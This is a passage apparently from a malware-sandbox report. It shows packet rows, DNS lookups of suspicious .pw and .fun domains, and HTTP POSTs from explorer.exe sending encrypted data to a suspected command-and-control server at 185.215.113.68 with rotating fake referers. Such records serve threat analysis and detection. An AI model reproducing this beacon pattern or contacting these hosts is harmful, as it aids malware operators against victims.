Dec 27, 2023 18:12:25.630727053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630740881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630748034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630759954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630768061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630793095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630809069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630816936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630820990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630825043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630860090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630922079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630929947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630937099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630943060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630949974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630963087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630963087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630970955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630992889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.631011963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.634536982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634577990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634588957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634641886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.634646893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634655952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634668112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634701967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.634706020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634715080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634721994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634747982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.634771109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634779930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634808064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.634865046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634872913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634882927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634888887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634896994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634905100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634912968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.634919882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.634939909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.635104895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635112047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635123968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635129929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635137081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635143995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635153055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.635157108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635165930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635169983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.635174036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635185003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635193110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635195971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.635200024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635212898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635220051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635224104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.635229111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635236025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635241032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.635241985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635252953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635260105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635266066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.635270119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635282993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635283947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.635291100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635298967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635309935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.635335922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.635400057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635407925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635413885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635426044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.635432959 CET	80	49738	5.42.65.125	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2023 18:12:17.400834084 CET	192.168.2.4	1.1.1.1	0x3720	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:18.383542061 CET	192.168.2.4	1.1.1.1	0x625b	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:38.445866108 CET	192.168.2.4	1.1.1.1	0x60ff	Standard query (0)	politefrightenpowoa.pw	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:38.626749992 CET	192.168.2.4	1.1.1.1	0x81e	Standard query (0)	opposesicknessopw.pw	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:38.816838980 CET	192.168.2.4	1.1.1.1	0x5fb	Standard query (0)	chincenterblandwka.pw	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:39.639739037 CET	192.168.2.4	1.1.1.1	0x6a7a	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:47.768521070 CET	192.168.2.4	1.1.1.1	0x6de6	Standard query (0)	soupinterestoe.fun	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:13:15.813180923 CET	192.168.2.4	1.1.1.1	0x9f79	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:13:16.037658930 CET	192.168.2.4	1.1.1.1	0x7d4b	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:13:33.621644974 CET	192.168.2.4	1.1.1.1	0xf532	Standard query (0)	46.138.7.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Dec 27, 2023 18:13:53.716454029 CET	192.168.2.4	1.1.1.1	0x4990	Standard query (0)	oshi.at	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2023 18:12:17.522223949 CET	1.1.1.1	192.168.2.4	0x3720	No error (0)	bitbucket.org		104.192.141.1	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:18.513187885 CET	1.1.1.1	192.168.2.4	0x625b	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2023 18:12:18.513187885 CET	1.1.1.1	192.168.2.4	0x625b	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2023 18:12:18.513187885 CET	1.1.1.1	192.168.2.4	0x625b	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.140.225	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:18.513187885 CET	1.1.1.1	192.168.2.4	0x625b	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.82.140	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:18.513187885 CET	1.1.1.1	192.168.2.4	0x625b	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.222.137	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:18.513187885 CET	1.1.1.1	192.168.2.4	0x625b	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.196.209	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:18.513187885 CET	1.1.1.1	192.168.2.4	0x625b	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.233.65	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:18.513187885 CET	1.1.1.1	192.168.2.4	0x625b	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.95.145	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:18.513187885 CET	1.1.1.1	192.168.2.4	0x625b	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.204.177	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:18.513187885 CET	1.1.1.1	192.168.2.4	0x625b	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.201.225	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:38.944684029 CET	1.1.1.1	192.168.2.4	0x5fb	No error (0)	chincenterblandwka.pw		104.21.64.47	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:38.944684029 CET	1.1.1.1	192.168.2.4	0x5fb	No error (0)	chincenterblandwka.pw		172.67.176.11	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:39.761857986 CET	1.1.1.1	192.168.2.4	0x6a7a	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2023 18:12:39.761857986 CET	1.1.1.1	192.168.2.4	0x6a7a	No error (0)	api4.ipify.org		104.237.62.212	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:39.761857986 CET	1.1.1.1	192.168.2.4	0x6a7a	No error (0)	api4.ipify.org		173.231.16.77	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:39.761857986 CET	1.1.1.1	192.168.2.4	0x6a7a	No error (0)	api4.ipify.org		64.185.227.156	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:47.896825075 CET	1.1.1.1	192.168.2.4	0x6de6	No error (0)	soupinterestoe.fun		104.21.24.252	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:12:47.896825075 CET	1.1.1.1	192.168.2.4	0x6de6	No error (0)	soupinterestoe.fun		172.67.221.65	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:13:15.938036919 CET	1.1.1.1	192.168.2.4	0x9f79	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:13:16.553591013 CET	1.1.1.1	192.168.2.4	0x7d4b	No error (0)	host-host-file8.com		158.160.130.138	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:13:33.743587017 CET	1.1.1.1	192.168.2.4	0xf532	Name error (3)	46.138.7.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Dec 27, 2023 18:13:53.838939905 CET	1.1.1.1	192.168.2.4	0x4990	No error (0)	oshi.at		194.15.112.248	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:13:53.838939905 CET	1.1.1.1	192.168.2.4	0x4990	No error (0)	oshi.at		188.241.120.6	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:13:53.838939905 CET	1.1.1.1	192.168.2.4	0x4990	No error (0)	oshi.at		195.66.210.3	A (IP address)	IN (0x0001)	false
Dec 27, 2023 18:13:53.838939905 CET	1.1.1.1	192.168.2.4	0x4990	No error (0)	oshi.at		5.253.86.15	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	185.215.113.68	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:16.367486954 CET	288	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://asmeqolcabkvvynp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 184 Host: 185.215.113.68
Dec 27, 2023 18:12:16.367523909 CET	184	OUT	Data Raw: 14 6d 63 7f 44 11 11 f3 f8 78 a2 57 04 d5 6b 52 34 f0 87 20 b2 15 1f 46 e1 9c 35 ab 84 aa b2 e3 9e dc 43 b9 ca 83 19 a1 7d 75 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 2b af a2 d5 f3 c9 39 df 28 fc 8d 2c e4 20 Data Ascii: mcDxWkR4 F5C}u}~Wj3L?bhP+9(, Ka]&qDt<B>X%#c2ZE]6BCy,V7;R v@\&LbBe\|&">OTSCh
Dec 27, 2023 18:12:16.665014982 CET	204	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:16 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 38 0d 0a 04 00 00 00 2d 20 5c 6c 0d 0a 30 0d 0a 0d 0a Data Ascii: 8- \l0
Dec 27, 2023 18:12:16.669740915 CET	285	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aeisorhyubnmb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 242 Host: 185.215.113.68
Dec 27, 2023 18:12:16.669784069 CET	242	OUT	Data Raw: 14 6d 63 7f 44 11 11 f3 f8 78 a2 57 04 d5 6b 52 34 f0 87 20 b2 15 1f 46 e1 9c 35 ab 84 aa b2 e3 9e dc 43 b9 ca 83 19 a1 7d 75 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a2 d5 f3 c9 38 df 28 fc 88 7b ea 4f Data Ascii: mcDxWkR4 F5C}u}~Wj3L?bhP(8({Ok[3I1S5Sj>S~"DOX<bWI;[)IR+wI3JC:No= wXRuU(>W\|:>XGz@xfwi jr%3Jf
Dec 27, 2023 18:12:17.378969908 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 35 63 0d 0a 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 10 d8 fb df 5e bc 1a e5 bb 26 38 d3 93 5f fe d0 3a d7 a3 3b 4b eb 12 ad 01 7f 9a 0e d5 ba 37 b5 fe f5 6b bb 81 36 99 91 32 fd 7d e0 79 b2 04 06 98 2e c4 b2 9d 5b db 68 8f 6e 9d cf 80 f7 8e d0 77 81 b5 90 9e 2f 80 c9 73 0d a8 ea 0d 0a 30 0d 0a 0d 0a Data Ascii: 5cH>99$J^&8_:;K7k62}y.[hnw/s0
Dec 27, 2023 18:12:21.061328888 CET	287	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dhcrigngmhaxfbl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 238 Host: 185.215.113.68
Dec 27, 2023 18:12:21.061369896 CET	238	OUT	Data Raw: 14 6d 63 7f 44 11 11 f3 f8 78 a2 57 04 d5 6b 52 34 f0 87 20 b2 15 1f 46 e1 9c 35 ab 84 aa b2 e3 9e dc 43 b9 ca 83 19 a1 7d 75 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a2 d5 f3 c9 39 df 28 fc f4 59 b7 4c Data Ascii: mcDxWkR4 F5C}u}~Wj3L?bhP)9(YLiGV6NiRFXt-Q{l1^O,N*Z9.Lb1AUob!hZ]QTRr)qqRB[!OovgREr4^j`L>Av?
Dec 27, 2023 18:12:21.362274885 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:21 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 18:12:21.366123915 CET	285	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yyuhrdchfdpbe.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 171 Host: 185.215.113.68
Dec 27, 2023 18:12:21.366149902 CET	171	OUT	Data Raw: 14 6d 63 7f 44 11 11 f3 f8 78 a2 57 04 d5 6b 52 34 f0 87 20 b2 15 1f 46 e1 9c 35 ab 84 aa b2 e3 9e dc 43 b9 ca 83 19 a1 7d 75 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a3 d5 f3 c9 38 df 28 fc 9b 22 ef 3e Data Ascii: mcDxWkR4 F5C}u}~Wj3L?bhP(8(">*\FGgCi``k 3x9BVl+S?O0 j~k-UeIX%`id/
Dec 27, 2023 18:12:21.662626982 CET	239	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:21 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 61 0d 0a 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c5 12 e1 5c a9 f8 70 7d 87 d5 44 be c4 32 8a a5 31 5b f4 55 a6 1e 2d 0d 0a 30 0d 0a 0d 0a Data Ascii: 2aH>99$JY\p}D21[U-0
Dec 27, 2023 18:12:35.326375008 CET	287	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gaclrkxfkqsjdev.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: 185.215.113.68
Dec 27, 2023 18:12:35.326410055 CET	286	OUT	Data Raw: 14 6d 63 7f 44 11 11 f3 f8 78 a2 57 04 d5 6b 52 34 f0 87 20 b2 15 1f 46 e1 9c 35 ab 84 aa b2 e3 9e dc 43 b9 ca 83 19 a1 7d 75 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a3 d5 f3 c9 39 df 28 fc 85 37 be 24 Data Ascii: mcDxWkR4 F5C}u}~Wj3L?bhP)9(7$^eDovmXm)tFRHLx;V\|SV]YrEViwq)jt/Fm0v72IIB[u)cpLNG[Tly[ x763">PQ=s4bQ
Dec 27, 2023 18:12:35.624509096 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 18:12:35.627289057 CET	283	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://saqdvcnbety.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 130 Host: 185.215.113.68
Dec 27, 2023 18:12:35.627327919 CET	130	OUT	Data Raw: 14 6d 63 7f 44 11 11 f3 f8 78 a2 57 04 d5 6b 52 34 f0 87 20 b2 15 1f 46 e1 9c 35 ab 84 aa b2 e3 9e dc 43 b9 ca 83 19 a1 7d 75 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a0 d5 f3 c9 38 df 28 fc e9 72 ff 23 Data Ascii: mcDxWkR4 F5C}u}~Wj3L?bhP(8(r#b<e\o>>A*;IBHJ]s^N9.6
Dec 27, 2023 18:12:35.926887035 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 9e cd ad 49 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 28 3c ff 91 dd e4 d3 c2 7a 4d 8a a4 75 b4 f3 cf 5f 21 6f 40 51 f8 43 ab 4c cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 11 54 09 11 89 d2 af 2b e4 02 3d 97 24 41 7f fe a1 99 26 7d c6 74 f7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 4f 55 af ca 71 83 e8 b9 5f 45 28 18 ad 48 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff ff 78 97 af a6 7b b2 4d 82 fd 92 2b cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 b0 90 c0 e8 b1 55 84 3a a6 8d 43 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe 8c 70 e1 47 e4 fc 03 53 e2 37 df 87 b4 71 dc 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 41 63 c2 75 6e fd 29 2a e7 d0 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 68 ad 60 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 96 0f 2d 6e 04 93 02 8d e4 24 bf 70 7e 3e 3f 43 1e 99 cb cc 9a f1 a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 1a 1b 70 30 3f d6 6a 72 f3 79 9b 1d 50 40 0e 20 2c 36 fc 7a 5c 0a 74 df 70 af 6d 2d c6 e3 51 d2 cd b3 5f 2f 87 ee b7 0f 9a 2e 51 79 60 9d ba 11 05 cc 5a d8 2c bd 